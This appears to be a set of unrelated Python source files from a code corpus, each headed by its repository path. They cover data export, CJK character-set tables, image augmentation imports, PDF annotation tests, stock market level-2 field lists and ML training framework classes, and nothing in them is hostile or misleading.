storage_location = ExportHandler.export_file_path(exported_file_name)
# Store the file name before we even start exporting so if the export fails
# and the file has been made we know where it is to clean it up correctly.
job.exported_file_name = exported_file_name
job.status = EXPORT_JOB_EXPORTING_STATUS
job.save()
with _create_storage_dir_if_missing_and_open(storage_location) as file:
queryset_serializer_class = exporter.queryset_serializer_class
if job.view is None:
serializer = queryset_serializer_class.for_table(job.table)
else:
serializer = queryset_serializer_class.for_view(job.view)
serializer.write_to_file(
PaginatedExportJobFileWriter(file, job), **job.export_options
)
return job
def _generate_random_file_name_with_extension(file_extension):
return str(uuid.uuid4()) + file_extension
def _create_storage_dir_if_missing_and_open(storage_location) -> BinaryIO:
"""
Attempts to open the provided storage location in binary overwriting write mode.
If it encounters a FileNotFound error will attempt to create the folder structure
leading upto to the storage location and then open again.
:param storage_location: The storage location to open and ensure folders for.
:return: The open file descriptor for the storage_location
"""
try:
return default_storage.open(storage_location, "wb+")
except FileNotFoundError:
# django's file system storage will not attempt to creating a missing
# EXPORT_FILES_DIRECTORY and instead will throw a FileNotFoundError.
# So we first save an empty file which will create any missing directories
# and then open again.
default_storage.save(storage_location, BytesIO())
return default_storage.open(storage_location, "wb")
|
bin/process_all.py | seralf/tate_collection | 330 | 12718054 | '''
Go through all artwork jsons and produce an index for
level0, level1, level2
Outputs a json collection
Does not preserve relationships between the levels
'''
import json
from os import walk
# use dict to elimiate duplicated entries as new entries
# are added as {'value of id': 'value of name'}
level0 = {}
level1 = {}
level2 = {}
def open_files(targetpath):
for dirname, dirnames, filenames in walk(targetpath):
for filename in filenames:
filepath = '/'.join([dirname,filename])
fileopen = open(filepath).read().decode('utf-8')
jsonopen = json.loads(fileopen)
get_all_subjects(jsonopen)
def get_all_subjects(jsonfile):
subjectcount = jsonfile['subjectCount']
if subjectcount is not 0:
subjects0 = jsonfile['subjects']['children']
for child in subjects0:
subjects1 = child['children']
level0[child['id']] = child['name']
for child in subjects1:
subjects2 = child['children']
level1[child['id']] = child['name']
for child in subjects2:
level2[child['id']] = child['name']
def write_file(data, filename):
jsondata = json.dumps(data,sort_keys = True,separators = (',',':'))
output = open('../processed/' + filename,'w')
output.writelines(jsondata)
output.close
open_files('../artworks')
write_files(level0,'level0.json')
write_files(level1,'level1.json')
write_files(level2,'level2.json') |
global_var.py | NightFurySL2001/CJK-character-count | 125 | 12718074 | global cjk_list
global unicode_list
global cjk_jian_list
global cjk_jian_fan_list
global cjk_fan_list
global cjk_count
global unicode_count
import os, sys
global main_directory
#if packaged by pyinstaller
#ref: https://stackoverflow.com/questions/404744/determining-application-path-in-a-python-exe-generated-by-pyinstaller
if getattr(sys, 'frozen', False):
#change from loading same folder to full folder, --onedir
main_directory = os.path.dirname(sys.executable)
#`pyinstaller --onefile` change to use the following code
#if '_MEIPASS2' in os.environ:
# main_directory = os.environ['_MEIPASS2']
#ref: https://stackoverflow.com/questions/9553262/pyinstaller-ioerror-errno-2-no-such-file-or-directory
else:
#dev mode
try: #py xx.py
app_full_path = os.path.realpath(__file__)
main_directory = os.path.dirname(app_full_path)
except NameError: #py then run code
main_directory = os.getcwd()
#english name
#old list for compatibility
cjk_list = {"gb2312":"GB/T 2312",
"gb12345":"GB/T 12345",
"gbk":"GBK",
"gb18030":"GB 18030",
"hanyi-jianfan":"Hanyi Fonts Simp./Trad. List",
"fangzheng-jianfan":"FounderType Simp./Trad. List",
"tongyong-guifan":"Table of General Standard Chinese Characters", #通用规范汉字表
"3500changyong":"List of Frequently Used Characters in Modern Chinese", #现代汉语常用字表
"7000tongyong":"List of Commonly Used Characters in Modern Chinese", #现代汉语通用字表
"yiwu-jiaoyu":"List of Frequently Used Characters of Compulsory Education", #义务教育语文课程常用字表
"4808changyong":"Chart of Standard Forms of Common National Characters", #常用国字标准字体表
"6343cichangyong":"Chart of Standard Forms of Less-Than-Common National Characters", #次常用国字标准字体表
"big5changyong":"BIG5 Common Character Set",
"big5":"BIG5",
"hkchangyong":"List of Graphemes of Commonly-Used Chinese Characters", #常用字字形表
"hkscs":"Hong Kong Supplementary Character Set",
"suppchara":"Common Supplementary Characters in Hong Kong (Level 1-6)"
}
cjk_jian_list_en = {"gb2312":"GB/T 2312",
"3500changyong":"List of Frequently Used Characters in Modern Chinese",
"7000tongyong":"List of Commonly Used Characters in Modern Chinese",
"yiwu-jiaoyu":"List of Frequently Used Characters of Compulsory Education",
"tongyong-guifan":"Table of General Standard Chinese Characters"
}
cjk_jian_fan_list_en = {"hanyi-jianfan":"Hanyi Fonts Simp./Trad. List",
"fangzheng-jianfan":"FounderType Simp./Trad. List",
"gbk":"GBK",
"gb18030":"GB 18030"
}
cjk_fan_list_en = {"4808changyong":"Chart of Standard Forms of Common National Characters",
"6343cichangyong":"Chart of Standard Forms of Less-Than-Common National Characters",
"big5changyong":"BIG5 Common Character Set",
"big5":"BIG5",
"hkchangyong":"List of Graphemes of Commonly-Used Chinese Characters",
"hkscs":"Hong Kong Supplementary Character Set",
"suppchara":"Common Supplementary Characters in Hong Kong (Level 1-6)",
"gb12345":"GB/T 12345"
}
unicode_list = {"kangxi":"Kangxi Radicals",
"kangxi-sup":"CJK Radical Supplements",
"zero":"〇",
"basic":"CJK Unified Ideographs",
"ext-a":"CJK Unified Ideographs Extension A",
"compat":"CJK Compatibility Ideographs",
"compat-ideo":" Non-Compatibility (Unified) Ideographs",
"ext-b":"CJK Unified Ideographs Extension B",
"ext-c":"CJK Unified Ideographs Extension C",
"ext-d":"CJK Unified Ideographs Extension D",
"ext-e":"CJK Unified Ideographs Extension E",
"ext-f":"CJK Unified Ideographs Extension F",
"compat-sup":"CJK Compatibility Ideographs Supplement",
"ext-g":"CJK Unified Ideographs Extension G",
"total":"Total Ideographs"
}
#chinese name (simp)
cjk_jian_list_zhs = {"gb2312":"GB/T 2312",
"3500changyong":"现代汉语常用字表*",
"7000tongyong":"现代汉语通用字表",
"yiwu-jiaoyu":"义务教育语文课程常用字表",
"tongyong-guifan":"通用规范汉字表"
}
cjk_jian_fan_list_zhs = {"hanyi-jianfan":"汉仪简繁字表",
"fangzheng-jianfan":"方正简繁字表",
"gbk":"GBK",
"gb18030":"GB 18030"
}
cjk_fan_list_zhs = {"4808changyong":"常用国字标准字体表",
"6343cichangyong":"次常用国字标准字体表",
"big5changyong":"五大码 (Big5) 常用汉字表",
"big5":"五大码 (Big5)",
"hkchangyong":"常用字字形表",
"hkscs":"香港增补字符集 (HKSCS)",
"suppchara":"常用香港外字表 (1-6级)",
"gb12345":"GB/T 12345"
}
unicode_list_zhs = {"kangxi":"康熙部首",
"kangxi-sup":"汉字部首补充",
"zero":"〇",
"basic":"中日韩统一表意文字",
"ext-a":"中日韩统一表意文字—扩展A区",
"compat":"中日韩兼容表意文字",
"compat-ideo":" 非兼容(统一)表意文字",
"ext-b":"中日韩统一表意文字—扩展B区",
"ext-c":"中日韩统一表意文字—扩展C区",
"ext-d":"中日韩统一表意文字—扩展D区",
"ext-e":"中日韩统一表意文字—扩展E区",
"ext-f":"中日韩统一表意文字—扩展F区",
"compat-sup":"中日韩兼容表意文字(补充区)",
"ext-g":"中日韩统一表意文字—扩展G区",
"total":"总汉字数"
}
#chinese name (trad)
cjk_fan_list_zht = {"4808changyong":"常用國字標準字體表",
"6343cichangyong":"次常用國字標準字體表",
"big5changyong":"五大碼 (Big5) 常用漢字表",
"big5":"五大碼 (Big5)",
"hkchangyong":"常用字字形表",
"hkscs":"香港增補字符集 (HKSCS)",
"suppchara":"常用香港外字表 (1-6級)",
"gb12345":"GB/T 12345"
}
cjk_jian_fan_list_zht = {"hanyi-jianfan":"漢儀簡繁字表",
"fangzheng-jianfan":"方正簡繁字表",
"gbk":"GBK",
"gb18030":"GB 18030"
}
cjk_jian_list_zht = {"gb2312":"GB/T 2312",
"3500changyong":"現代漢語常用字表",
"7000tongyong":"現代漢語通用字表",
"yiwu-jiaoyu":"義務教育語文課程常用字表",
"tongyong-guifan":"通用規範漢字表"
}
unicode_list_zht = {"kangxi":"康熙部首",
"kangxi-sup":"漢字部首補充",
"zero":"〇",
"basic":"中日韓統一表意文字",
"ext-a":"中日韓統一表意文字—擴展A區",
"compat":"中日韓兼容表意文字",
"compat-ideo":" 非兼容(統一)表意文字",
"ext-b":"中日韓統一表意文字—擴展B區",
"ext-c":"中日韓統一表意文字—擴展C區",
"ext-d":"中日韓統一表意文字—擴展D區",
"ext-e":"中日韓統一表意文字—擴展E區",
"ext-f":"中日韓統一表意文字—擴展F區",
"compat-sup":"中日韓兼容表意文字(補充區)",
"ext-g":"中日韓統一表意文字—擴展G區",
"total":"總漢字數"
}
#character count
cjk_count = {"gb2312":6763,
"gb12345":6866,
"gbk":20923,
"gb18030":0,
"hanyi-jianfan":9169,
"fangzheng-jianfan":9664,
"tongyong-guifan":8105,
"3500changyong":3500,
"7000tongyong":7000,
"yiwu-jiaoyu":3500,
"4808changyong":4808,
"6343cichangyong":6343,
"big5changyong":5401,
"big5":13060,
"hkchangyong":4825,
"hkscs":4603,
"suppchara":1097
}
unicode_count = {"kangxi":214,
"kangxi-sup":115,
"zero":1,
"basic":20992,
"ext-a":6592,
"compat":472,
"compat-ideo":12,
"ext-b":42720,
"ext-c":4153,
"ext-d":222,
"ext-e":5762,
"ext-f":7473,
"compat-sup":542,
"ext-g":4939,
"total":0
}
cjk_count["gb18030"] = unicode_count["zero"]+unicode_count["basic"]+unicode_count["ext-a"]
unicode_count["total"] = unicode_count["zero"]+unicode_count["compat-ideo"]+unicode_count["basic"]+unicode_count["ext-a"]+unicode_count["ext-b"]+unicode_count["ext-c"]+unicode_count["ext-d"]+unicode_count["ext-e"]+unicode_count["ext-f"]+unicode_count["ext-g"] |
TaobaoCrawler(new)/save_mysql_redis.py | wangbl11/ECommerceCrawlers | 3,469 | 12718116 | import pymysql
import redis
from config import *
def save_mysql_redis(res_list):
pass
|
kornia/augmentation/_3d/geometric/__init__.py | Ishticode/kornia | 418 | 12718155 | from kornia.augmentation._3d.geometric.affine import RandomAffine3D
from kornia.augmentation._3d.geometric.center_crop import CenterCrop3D
from kornia.augmentation._3d.geometric.crop import RandomCrop3D
from kornia.augmentation._3d.geometric.depthical_flip import RandomDepthicalFlip3D
from kornia.augmentation._3d.geometric.horizontal_flip import RandomHorizontalFlip3D
from kornia.augmentation._3d.geometric.perspective import RandomPerspective3D
from kornia.augmentation._3d.geometric.rotation import RandomRotation3D
from kornia.augmentation._3d.geometric.vertical_flip import RandomVerticalFlip3D
|
auto_make.py | xiaodotgua/renderer.gua | 315 | 12718173 | <gh_stars>100-1000
import os
import sys
import time
from watchdog.observers import Observer
from watchdog.events import PatternMatchingEventHandler
class AutoMake(PatternMatchingEventHandler):
patterns = ["*.h", "*.cpp"]
def process(self, event):
os.system('make osx')
def on_modified(self, event):
self.process(event)
if __name__ == '__main__':
print sys.argv
args = sys.argv[1:]
observer = Observer()
observer.schedule(AutoMake(), path=args[0] if args else '.')
observer.start()
try:
while True:
time.sleep(2)
except KeyboardInterrupt:
observer.stop()
observer.join()
|
tests/config/test_graphics_state.py | sourya-deepsource/pdf-annotate | 137 | 12718189 | # -*- coding: utf-8 -*-
from unittest import TestCase
import pytest
from pdfrw import PdfDict
from pdfrw import PdfName
from pdf_annotate.config import constants
from pdf_annotate.config.graphics_state import GraphicsState
class TestGraphicsState(TestCase):
def test_blank(self):
pdf_dict = GraphicsState().as_pdf_dict()
assert len(pdf_dict) == 1
assert pdf_dict.Type == PdfName('ExtGState')
def test_graphics_state(self):
state = GraphicsState(
line_width=2,
line_cap=constants.LINE_CAP_ROUND,
line_join=constants.LINE_JOIN_MITER,
miter_limit=1.404,
dash_array=[[1], 0],
stroke_transparency=0.7,
fill_transparency=0.5,
)
pdf_dict = state.as_pdf_dict()
assert pdf_dict == PdfDict(
Type=PdfName('ExtGState'),
LW=2,
LC=1,
LJ=0,
ML=1.404,
D=[[1], 0],
CA=0.7,
ca=0.5,
)
def test_dash_array(self):
with pytest.raises(ValueError):
GraphicsState(dash_array=[1, 1])
with pytest.raises(ValueError):
GraphicsState(dash_array=[[1.5], 1])
with pytest.raises(ValueError):
GraphicsState(dash_array='--- 1')
state = GraphicsState(dash_array=[[2, 1], 1])
assert state.dash_array == [[2, 1], 1]
def test_has_content(self):
assert not GraphicsState().has_content()
assert GraphicsState(line_width=2).has_content()
|
tfne/encodings/codeepneat/__init__.py | githealthy18/Tensorflow-Neuroevolution | 121 | 12718195 | # Import CoDeepNEAT module package
from tfne.encodings.codeepneat import modules
# Import modules
from tfne.encodings.codeepneat.codeepneat_genome import CoDeepNEATGenome
from tfne.encodings.codeepneat.codeepneat_blueprint import CoDeepNEATBlueprint
|
QUANTAXIS/QAData/level2.py | B34nK0/QUANTAXIS | 6,322 | 12718247 |
"""
字段 含义 数据类型 说明
SecurityID 证券代码 STRING
DateTime 日期时间 NUMBER 20151123091630
PreClosePx 昨收价 NUMBER(3)
OpenPx 开始价 NUMBER(3)
HighPx 最高价 NUMBER(3)
LowPx 最低价 NUMBER(3)
LastPx 最新价 NUMBER(3)
TotalVolumeTrade 成交总量 NUMBER 股票:股 基金:份 债券:手指数:手
TotalValueTrade 成交总金额 NUMBER(2) 元
InstrumentStatus 交易状态 STRING
BidPrice[10] 申买十价 NUMBER(3)
BidOrderQty[10] 申买十量 NUMBER
BidNumOrders[10] 申买十实际总委托笔数 NUMBER
BidOrders[50] 申买一前 50 笔订单 NUMBER
OfferPrice[10] 申卖十价 NUMBER(3)
OfferOrderQty[10] 申卖十量 NUMBER
OfferNumOrders[10] 申卖十实际总委托笔数 NUMBER
OfferOrders[50] 申卖一前 50 笔订单 NUMBER
NumTrades 成交笔数 NUMBER
IOPV ETF 净值估值 NUMBER (3)
TotalBidQty 委托买入总量 NUMBER 股票:股 基金:份 债券:手
TotalOfferQty 委托卖出总量 NUMBER 股票:股 基金:份 债券:手
WeightedAvgBidPx 加权平均委买价格 NUMBER (3)
WeightedAvgOfferPx 加权平均委卖价格 NUMBER (3)
TotalBidNumber 买入总笔数 NUMBER
TotalOfferNumber 卖出总笔数 NUMBER
BidTradeMaxDuration 买入成交最大等待时间 NUMBER
OfferTradeMaxDuration 卖出成交最大等待时间 NUMBER
NumBidOrders 买方委托价位数 NUMBER
NumOfferOrders 卖方委托价位数 NUMBER
WithdrawBuyNumber 买入撤单笔数 NUMBER
WithdrawBuyAmount 买入撤单数量 NUMBER
WithdrawBuyMoney 买入撤单金额 NUMBER (2)
WithdrawSellNumber 卖出撤单笔数 NUMBER
WithdrawSellAmount 卖出撤单数量 NUMBER
WithdrawSellMoney 卖出撤单金额 NUMBER (2)
ETFBuyNumber ETF 申购笔数 NUMBER
ETFBuyAmount ETF 申购数量 NUMBER
ETFBuyMoney ETF 申购金额 NUMBER (2)
ETFSellNumber ETF 赎回笔数 NUMBER
ETFSellAmount ETF 赎回数量 NUMBER
ETFSellMoney ETF 赎回金额 NUMBER (2)
"""
"""
SecurityID 证券代码 STRING
TradeTime 成交时间 NUMBER 2015112309163002
精确到百分之一秒
TradePrice 成交价格 NUMBER (3)
TradeQty 成交量 NUMBER
TradeAmount 成交金额 NUMBER (3)
BuyNo 买方订单号 NUMBER
SellNo 卖方订单号 NUMBER
TradeIndex 成交序号 NUMBER 自 2021 年 4 月 26 日启用
ChannelNo 频道代码 NUMBER 自 2021 年 4 月 26 日启用
TradeBSFlag 内外盘标志 STRING 内外盘标志:
B – 外盘,主动买
S – 内盘,主动卖
N – 未知
自 2021 年 4 月 26 日启用
BizIndex 业务序列号 NUMBER 业务序列号
与竞价逐笔委托消息合并后
的连续编号,从 1 开始,按
Channel 连续
自 2021 年 4 月 26 日启用
"""
shold_tick_columns = ['TradeTime', 'TradeChannel', 'SendingTime', 'SellNo', 'TradeAmount',
'TradeBSFlag', 'TradeIndex', 'TradePrice', 'TradeQty', 'BuyNo']
shold_snapshot_columns = ['NumTrades', 'OfferTradeMaxDuration', 'ImageStatus', 'TotalBidNumber',
'TotalWarrantExecQty', 'WithdrawSellMoney', 'IOPV', 'BidOrders',
'ETFSellAmount', 'TotalOfferQty', 'WithdrawBuyNumber',
'WeightedAvgOfferPx', 'ETFBuyNumber', 'WarLowerPx', 'MsgSeqNum',
'WithdrawSellAmount', 'ETFSellMoney', 'Volume', 'BidOrderQty', 'OpenPx',
'HighPx', 'PreClosePx', 'LowPx', 'WeightedAvgBidPx', 'ETFSellNumber',
'OfferNumOrders', 'WithdrawSellNumber', 'ETFBuyAmount',
'TotalOfferNumber', 'OfferPrice', 'NumOfferOrders', 'BidPrice',
'OfferOrderQty', 'TotalBidQty', 'SendingTime', 'ETFBuyMoney',
'InstrumentStatus', 'WithdrawBuyAmount', 'ClosePx',
'BidTradeMaxDuration', 'NumBidOrders', 'LastPx', 'Amount', 'AveragePx',
'WarUpperPx', 'YieldToMaturity', 'BidNumOrders', 'WithdrawBuyMoney',
'TradingPhaseCode', 'QuotTime', 'OfferOrders']
sz_snapshot_columns = ['NumTrades', 'OfferNumOrders', 'LowerLimitPx', 'ImageStatus',
'OfferPrice', 'BidPrice', 'BidOrders', 'OfferOrderQty', 'PeRatio2',
'TotalBidQty', 'SendingTime', 'PeRatio1', 'TotalOfferQty', 'ClosePx',
'WeightedAvgPxChg', 'Change2', 'Change1', 'LastPx',
'WeightedAvgOfferPx', 'Amount', 'UpperLimitPx', 'AveragePx',
'TotalLongPosition', 'MsgSeqNum', 'Volume', 'BidNumOrders',
'BidOrderQty', 'TradingPhaseCode', 'QuotTime', 'OpenPx', 'OfferOrders',
'PreWeightedAvgPx', 'HighPx', 'PreClosePx', 'LowPx',
'WeightedAvgBidPx']
sz_order = ['OrderQty', 'OrdType', 'TransactTime', 'ExpirationDays', 'Side',
'ApplSeqNum', 'Contactor', 'SendingTime', 'Price', 'ChannelNo',
'ExpirationType', 'ContactInfo', 'ConfirmID']
sz_tick_columns = ['ApplSeqNum', 'BidApplSeqNum', 'SendingTime', 'Price', 'ChannelNo',
'Qty', 'OfferApplSeqNum', 'Amt', 'ExecType', 'TransactTime']
sh_tick_columns = ['SecurityID', 'TradeTime', 'TradePrice', 'TradeQty', 'TradeAmount',
'BuyNo', 'SellNo', 'TradeIndex', 'ChannelNo', 'TradeBSFlag', 'BizIndex']
sh_snapshot_columns = ['SecurityID', 'DateTime', 'PreClosePx', 'OpenPx', 'HighPx', 'LowPx', 'LastPx',
'TotalVolumeTrade', 'TotalValueTrade', 'InstrumentStatus',
'BidPrice0', 'BidPrice1', 'BidPrice2', 'BidPrice3', 'BidPrice4', 'BidPrice5', 'BidPrice6', 'BidPrice7', 'BidPrice8', 'BidPrice9',
'BidOrderQty0', 'BidOrderQty1', 'BidOrderQty2', 'BidOrderQty3', 'BidOrderQty4', 'BidOrderQty5', 'BidOrderQty6', 'BidOrderQty7', 'BidOrderQty8', 'BidOrderQty9',
'BidNumOrders0', 'BidNumOrders1', 'BidNumOrders2', 'BidNumOrders3', 'BidNumOrders4', 'BidNumOrders5', 'BidNumOrders6', 'BidNumOrders7', 'BidNumOrders8', 'BidNumOrders9',
'BidOrders0', 'BidOrders1', 'BidOrders2', 'BidOrders3', 'BidOrders4', 'BidOrders5', 'BidOrders6', 'BidOrders7', 'BidOrders8', 'BidOrders9',
'BidOrders10', 'BidOrders11', 'BidOrders12', 'BidOrders13', 'BidOrders14', 'BidOrders15', 'BidOrders16', 'BidOrders17', 'BidOrders18', 'BidOrders19',
'BidOrders20', 'BidOrders21', 'BidOrders22', 'BidOrders23', 'BidOrders24', 'BidOrders25', 'BidOrders26', 'BidOrders27', 'BidOrders28', 'BidOrders29',
'BidOrders30', 'BidOrders31', 'BidOrders32', 'BidOrders33', 'BidOrders34', 'BidOrders35', 'BidOrders36', 'BidOrders37', 'BidOrders38', 'BidOrders39',
'BidOrders40', 'BidOrders41', 'BidOrders42', 'BidOrders43', 'BidOrders44', 'BidOrders45', 'BidOrders46', 'BidOrders47', 'BidOrders48', 'BidOrders49',
'OfferPrice0', 'OfferPrice1', 'OfferPrice2', 'OfferPrice3', 'OfferPrice4', 'OfferPrice5', 'OfferPrice6', 'OfferPrice7', 'OfferPrice8', 'OfferPrice9',
'OfferOrderQty0', 'OfferOrderQty1', 'OfferOrderQty2', 'OfferOrderQty3', 'OfferOrderQty4', 'OfferOrderQty5', 'OfferOrderQty6', 'OfferOrderQty7', 'OfferOrderQty8', 'OfferOrderQty9',
'OfferNumOrders0', 'OfferNumOrders1', 'OfferNumOrders2', 'OfferNumOrders3', 'OfferNumOrders4', 'OfferNumOrders5', 'OfferNumOrders6', 'OfferNumOrders7', 'OfferNumOrders8', 'OfferNumOrders9',
'OfferOrders0', 'OfferOrders1', 'OfferOrders2', 'OfferOrders3', 'OfferOrders4', 'OfferOrders5', 'OfferOrders6', 'OfferOrders7', 'OfferOrders8', 'OfferOrders9',
'OfferOrders10', 'OfferOrders11', 'OfferOrders12', 'OfferOrders13', 'OfferOrders14', 'OfferOrders15', 'OfferOrders16', 'OfferOrders17', 'OfferOrders18', 'OfferOrders19',
'OfferOrders20', 'OfferOrders21', 'OfferOrders22', 'OfferOrders23', 'OfferOrders24', 'OfferOrders25', 'OfferOrders26', 'OfferOrders27', 'OfferOrders28', 'OfferOrders29',
'OfferOrders30', 'OfferOrders31', 'OfferOrders32', 'OfferOrders33', 'OfferOrders34', 'OfferOrders35', 'OfferOrders36', 'OfferOrders37', 'OfferOrders38', 'OfferOrders39',
'OfferOrders40', 'OfferOrders41', 'OfferOrders42', 'OfferOrders43', 'OfferOrders44', 'OfferOrders45', 'OfferOrders46', 'OfferOrders47', 'OfferOrders48', 'OfferOrders49',
'NumTrades', 'IOPV', 'TotalBidQty', 'TotalOfferQty', 'WeightedAvgBidPx', 'WeightedAvgOfferPx', 'TotalBidNumber',
'TotalOfferNumber', 'BidTradeMaxDuration', 'OfferTradeMaxDuration', 'NumBidOrders', 'NumOfferOrders',
'WithdrawBuyNumber', 'WithdrawBuyAmount', 'WithdrawBuyMoney', 'WithdrawSellNumber', 'WithdrawSellAmount', 'WithdrawSellMoney',
'ETFBuyNumber', 'ETFBuyAmount', 'ETFBuyMoney', 'ETFSellNumber', 'ETFSellAmount', 'ETFSellMoney']
def maketime(time):
time = str(time)
return time[0:4]+'-'+time[4:6]+'-' + time[6:8] + ' '+time[8:10]+':'+time[10:12]+':'+time[12:14]
def maketime_tick(time):
time = str(time)
return time[0:4]+'-'+time[4:6]+'-' + time[6:8] + ' '+time[8:10]+':'+time[10:12]+':'+time[12:14]+'.' + time[14:]
|
runway/config/models/__init__.py | avosper-intellaegis/runway | 134 | 12718299 | <reponame>avosper-intellaegis/runway
"""Runway & CFNgin config models."""
|
util/pynoise/base_noise.py | Reytuag/non-stationary_texture_syn | 351 | 12718302 | import constants
def _integer_surround(number):
"""Return the 2 closest integers to number, smaller integer first."""
if number > 0:
return int(number), int(number) + 1
else:
return int(number) - 1, int(number)
def _interpolate(first, second, between):
return first + (second - first) * between
def _cubic_scurve(value):
return value * value * (3.0 - 2.0 * value)
def _quintic_scurve(value):
return (6.0 * value ** 5) - (15.0 * value ** 4) + (10.0 * value ** 3)
def _get_vector(x, y, z, seed):
index = (
constants.x_noise * x +
constants.y_noise * y +
constants.z_noise * z +
constants.seed * seed
)
index ^= index >> 8 # xorshift random
return constants.vectors[index % len(constants.vectors)]
def noise_vector(x, y, z, int_x, int_y, int_z, seed_offset):
vector = _get_vector(int_x, int_y, int_z, seed_offset)
diff_vector = (x - int_x, y - int_y, z - int_z)
return (
vector[0] * diff_vector[0] +
vector[1] * diff_vector[1] +
vector[2] * diff_vector[2]
)
def noise_gradients(x, y, z, seed_offset):
unit_x = _integer_surround(x)
unit_y = _integer_surround(y)
unit_z = _integer_surround(z)
x_decimal = _cubic_scurve(x - unit_x[0])
y_decimal = _cubic_scurve(y - unit_y[0])
z_decimal = _cubic_scurve(z - unit_z[0])
n000 = noise_vector(x, y, z, unit_x[0], unit_y[0], unit_z[0], seed_offset)
n100 = noise_vector(x, y, z, unit_x[1], unit_y[0], unit_z[0], seed_offset)
n010 = noise_vector(x, y, z, unit_x[0], unit_y[1], unit_z[0], seed_offset)
n110 = noise_vector(x, y, z, unit_x[1], unit_y[1], unit_z[0], seed_offset)
n001 = noise_vector(x, y, z, unit_x[0], unit_y[0], unit_z[1], seed_offset)
n101 = noise_vector(x, y, z, unit_x[1], unit_y[0], unit_z[1], seed_offset)
n011 = noise_vector(x, y, z, unit_x[0], unit_y[1], unit_z[1], seed_offset)
n111 = noise_vector(x, y, z, unit_x[1], unit_y[1], unit_z[1], seed_offset)
interp1 = _interpolate(n000, n100, x_decimal)
interp2 = _interpolate(n010, n110, x_decimal)
interp3 = _interpolate(n001, n101, x_decimal)
interp4 = _interpolate(n011, n111, x_decimal)
interp5 = _interpolate(interp1, interp2, y_decimal)
interp6 = _interpolate(interp3, interp4, y_decimal)
return _interpolate(interp5, interp6, z_decimal)
|
AppServer/lib/django-1.4/tests/regressiontests/special_headers/urls.py | loftwah/appscale | 790 | 12718310 | # coding: utf-8
from __future__ import absolute_import
from django.conf.urls import patterns
from django.views.generic.list_detail import object_detail
from . import views
from .models import Article
urlpatterns = patterns('',
(r'^special_headers/article/(?P<object_id>\d+)/$', object_detail, {'queryset': Article.objects.all()}),
(r'^special_headers/xview/func/$', views.xview_dec(views.xview)),
(r'^special_headers/xview/class/$', views.xview_dec(views.XViewClass.as_view())),
)
|
nni/nas/pytorch/base_trainer.py | dutxubo/nni | 9,680 | 12718328 | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from abc import ABC, abstractmethod
class BaseTrainer(ABC):
@abstractmethod
def train(self):
"""
Override the method to train.
"""
raise NotImplementedError
@abstractmethod
def validate(self):
"""
Override the method to validate.
"""
raise NotImplementedError
@abstractmethod
def export(self, file):
"""
Override the method to export to file.
Parameters
----------
file : str
File path to export to.
"""
raise NotImplementedError
@abstractmethod
def checkpoint(self):
"""
Override to dump a checkpoint.
"""
raise NotImplementedError
|
catalyst/core/runner.py | tadejsv/catalyst | 206 | 12718365 | from typing import Any, Dict, Mapping, Optional
from abc import ABC, abstractmethod
from collections import defaultdict, OrderedDict
import torch
from torch.utils.data import DataLoader, DistributedSampler
from catalyst.core.callback import Callback, ICallback
from catalyst.core.engine import Engine
from catalyst.core.logger import ILogger
from catalyst.core.misc import (
check_callbacks,
get_loader_batch_size,
get_loader_num_samples,
is_str_intersections,
sort_callbacks_by_order,
)
from catalyst.typing import (
RunnerCriterion,
RunnerModel,
RunnerOptimizer,
RunnerScheduler,
)
from catalyst.utils.misc import maybe_recursive_call, set_global_seed
BATCH_METRICS = Dict[str, float] # {"loss": 1.7}
LOADER_METRICS = Dict[str, float] # {"loss": 1.7}
# {"train": {"loss": 1.7}, "valid": {"loss": 1.7}}
EPOCH_METRICS = Dict[str, LOADER_METRICS]
# {0: {"train": {}, "valid": {}}, 1: {...}}
EXPERIMENT_METRICS = Dict[int, EPOCH_METRICS]
class IRunnerError(Exception):
"""Exception class for all runner errors."""
pass
class IRunner(ICallback, ILogger, ABC):
"""
An abstraction that contains all the logic of how to run the experiment,
epochs, loaders and batches.
Please check examples.
Args:
model: Torch model object
engine: Engine instance
Abstraction, please check out implementations for more details:
- :py:mod:`catalyst.runners.runner.Runner`
- :py:mod:`catalyst.runners.config.ConfigRunner`
.. note::
To learn more about Catalyst Core concepts, please check out
- :py:mod:`catalyst.core.runner.IRunner`
- :py:mod:`catalyst.core.engine.Engine`
- :py:mod:`catalyst.core.callback.Callback`
.. note::
Please follow the `minimal examples`_ sections for use cases.
.. _`minimal examples`: https://github.com/catalyst-team/catalyst#minimal-examples # noqa: E501, W505
"""
def __init__(self, model: RunnerModel = None, engine: Engine = None):
"""Init."""
self.engine: Engine = engine
self.loggers: Dict[str, ILogger] = {}
self.loaders: Dict[str, DataLoader] = None
self.model: RunnerModel = model
self.criterion: RunnerCriterion = None
self.optimizer: RunnerOptimizer = None
self.scheduler: RunnerScheduler = None
self.callbacks: Dict[str, Callback] = {}
# the dataflow - model input/output and other batch tensors
self.batch: Dict[str, torch.Tensor] = None
# metrics flow - batch, loader and epoch metrics
self.batch_metrics: BATCH_METRICS = defaultdict(None)
self.loader_metrics: LOADER_METRICS = defaultdict(None)
self.epoch_metrics: EPOCH_METRICS = defaultdict(None)
self.experiment_metrics: EXPERIMENT_METRICS = defaultdict(None)
# experiment info
self.epoch_step: int = 0
self.batch_step: int = 0
self.sample_step: int = 0
# loader info
self.loader: DataLoader = None
self.loader_key: str = None
self.is_train_loader: bool = False
self.is_valid_loader: bool = False
self.is_infer_loader: bool = True
self.loader_batch_size: int = 0
self.loader_batch_len: int = 0
self.loader_sample_len: int = 0
self.loader_batch_step: int = 0
self.loader_sample_step: int = 0
# batch info
self.batch_size: int = 0
# extra
self.exception: Exception = None
self.need_early_stop: bool = False
self._local_rank: int = -1
self._world_size: int = -1
@property
def seed(self) -> int:
"""Experiment's seed for reproducibility."""
return 42
@property
def hparams(self) -> OrderedDict:
"""
Returns hyper-parameters for current run.
Example::
>>> runner.hparams
OrderedDict([('optimizer', 'Adam'),
('lr', 0.02),
('betas', (0.9, 0.999)),
('eps', 1e-08),
('weight_decay', 0),
('amsgrad', False),
('train_batch_size', 32)])
Returns:
dictionary with hyperparameters
"""
return {}
@property
def num_epochs(self) -> int:
"""Returns the number of epochs in the experiment."""
return 1
def log_artifact(self, *args, **kwargs) -> None:
"""Logs artifact (file like audio, video, csv, etc.) to available loggers."""
for logger in self.loggers.values():
logger.log_artifact(*args, **kwargs, runner=self)
def log_image(self, *args, **kwargs) -> None:
"""Logs image to available loggers."""
for logger in self.loggers.values():
logger.log_image(*args, **kwargs, runner=self)
def log_hparams(self, *args, **kwargs) -> None:
"""Logs hyperparameters to available loggers."""
